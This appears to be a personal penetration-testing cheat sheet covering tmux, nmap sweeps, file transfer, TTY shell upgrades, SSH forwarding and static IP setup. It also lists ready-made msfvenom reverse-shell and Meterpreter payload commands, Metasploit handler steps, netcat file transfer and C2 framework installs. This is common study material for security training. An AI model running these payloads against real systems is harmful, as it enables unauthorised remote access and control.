Wiki

TMUX

tmux commands

tmux: opens tmux
PREFIX + c: creates new pane
PREFIX + p: jump back a pane
PREFIX + #: jump to a certain pane based on number
PREFIX + .: move a pane
PREFIX + x: delete a pane
PREFIX + ,: rename a pane
PREFIX + $: rename a window
PREFIX + D: detach from tmux session
  > tmux attach -t <pane name>: get back into tmux
  > tmux new -s <pane name>: create a new tmux session
  > tmux kill-session <pane name>: kills a tmux session
PREFIX + %: split pane vertically
PREFIX + ": split pane horizontally
PREFIX + Z: makes your current pane full screen during a split screen so you can copy the contents in your terminal

tmux essentials

tmux attach -t <name>: attach back into a session
tmux new -s <name>: create new tmux session
tmux source-file ~/.tmux.conf: reload .tmux.conf
tmux ls: show all tmux sessions

tmux-logging

Logging: prefix + shift + p
Screen capture: prefix + alt + p
Save all history: prefix + alt + shift + p
Clear pane history: prefix + alt + c

NMAP

find nmap scripts

locate <service/keyword> | grep .nse$
  > locate http- | grep .nse$
locate *.nse | grep <service/keyword>

network sweep

nmap -sn <IP block>

sudo arp-scan --interface=eth0 192.168.182.0/24

FILE TRANSFER

smb

smbserver.py -smb2support <share name> .
KALI to WINDOWS: copy \\<SMB IP>\<folder>\<file> C:\<file location>
WINDOWS to KALI: copy <file> \\<SMB IP>\<folder>\<file>

Enable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol-Client" -All if sharing doesn't work. Restart required
**set-executionpolicy remotesigned to enable running scripts

nc

RECIEVING END: nc -l -p <port> > <file>
SENDING END: nc -w 3 <IP> <port> < lse1.txt

python

Python 2: python -m SimpleHTTPServer <port>
Python 3: python -m http.server <port>
  > --directory </path/to/directory>
  > --bind <specific IP>

FULL FUNCTONING SHELL

spawn tty shell

which python
  > ls /usr/bin | grep python
  > apt list --installed | grep python
  > dpkg -l | grep python
python -c 'import pty; pty.spawn("/bin/bash")' OR python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z to put terminal in the background
echo $TERM (copy the value)
stty raw -echo; fg
reset
  > paste $TERM value

For further shell enhancement:

ON LOCAL MACHINE: stty -a
  > copy the row and columns value
ON REMOTE MACHINE: stty rows <value> columns <value>

This will make your tty shell use the entire screen, instead of being cut off.

PORT FORWARDING

ssh port forwarding

DO THIS ON THE MACHINE THAT YOU WANT TO PORT FORWARD TO (AKA YOUR HOST)

ssh -L <local port>:<local IP>:<remote port> <remote user>@<remote domain/ip>

INSTALLATIONS

C2

Mythic

git clone https://github.com/its-a-feature/Mythic
sudo ./mythic-cli mythic start
sudo nano .env (if you want to edit the configuration)

./install_docker_ubuntu
sudo ./mythic-cli mythic start
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git
sudo ./mythic-cli install github https://github.com/MythicAgents/Medusa.git
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http.git

Covenant

jVis

Docker

DOCKER
printf "%s\n" "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-ce-archive-keyring.gpg] https://download.docker.com/linux/debian buster stable" | sudo tee /etc/apt/sources.list.d/docker-ce.list
curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/docker-ce-archive-keyring.gpg
sudo apt install docker-ce docker-ce-cli

DOCKER-COMPOSE
sudo curl -L "https://github.com/docker/compose/releases/download/2.1.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose (if docker-compose no worky)

AutoRecon

autorecon <IP 1> <IP 2> -o <output location>
  > autorecon <hostname 1>
  > autorecon <IP block/24>
  > autorecon -t <target file>

METASPLOIT

msfvenom

Non-Meterpreter

Windows

STAGED
x86: msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

STAGELESS
x86: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

STAGED
x86: msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

STAGELESS
x86: msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Web

asp: msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jsp: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
php: msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter

Windows

STAGED
x86: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

STAGELESS
x86: msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exee
x64: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Linux

STAGED
x86: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

STAGELESS
x86: msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
x64: msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Web

asp: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
jsp: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp
war: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war
php: msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

To use meterpreter shells make sure to:

use exploit/multi/handler
set payload <payload>
  > set payload windows/shell/reverse_tcp

run post/multi/recon/local_exploit_suggester

NETWORKING

setting static IPs

**Small note: These methods will disconnect you from your session if you are doing it remotely. I had console access to complete this setup. To make sure this goes off without a hitch, I found a StackOverflow page on it.

Set the promote_secondaries parameter on your ethernet adapter, or globally on all of the interfaces:

echo 1 > /proc/sys/net/ipv4/conf/eth0/promote_secondaries 
OR 
sysctl net.ipv4.conf.eth0.promote_secondaries=1

Ubuntu

First copy the file and make a backup just in case

cp /etc/netplan/01-netcfg.yaml /etc/netplan/01-netcfg.yaml.bak

Edit the config file

# This is the network config written by 'subiquity' 
# ORIGINAL FILE WITH DHCP ENABLED
network:
  ethernets:
    eth0 (or enp0s3):
      dhcp4: true
  version: 2

# This is the network config written by 'subiquity'
# NEW CONFIG FILE WITH STATIC IP SET UP
network:
  ethernets:
    eth0 (or enp0s3):
      dhcp4: no
      addresses: [<IP>/<subnet>]
      gateway4: 192.168.0.1
      nameservers:
        addresses: [<DNS server(s)>]
  version: 2

Restart network service

sudo netplan try
sudo netplan apply

CentOS

First copy the file and make a backup just in case

cp /etc/sysconfig/network-scripts/ifcfg-<NETWORK-ADAPTER> /etc/sysconfig/network-scripts/ifcfg-<NETWORK-ADAPTER>.bak

Edit the config file

# ORIGINAL FILE WITH DHCP ENABLED

TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=dhcp
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
NAME=eth0
UUID=be36f738-af9e-4ea7-b93e-f555e6d45cec
DEVICE=eth0
ONBOOT=yes

# NEW CONFIG FILE WITH STATIC IP SET UP

TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=none
IPADDR=<IP>
PREFIX=</subnet>
GATEWAY=<Gateway IP>
DNS1=<DNS server>
DNS2=<DNS server>
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
NAME=eth0
UUID=be36f738-af9e-4ea7-b93e-f555e6d45cec
DEVICE=eth0
ONBOOT=yes

Restart network service

sudo ifdown <network adapter>
sudo ifup <network adapter>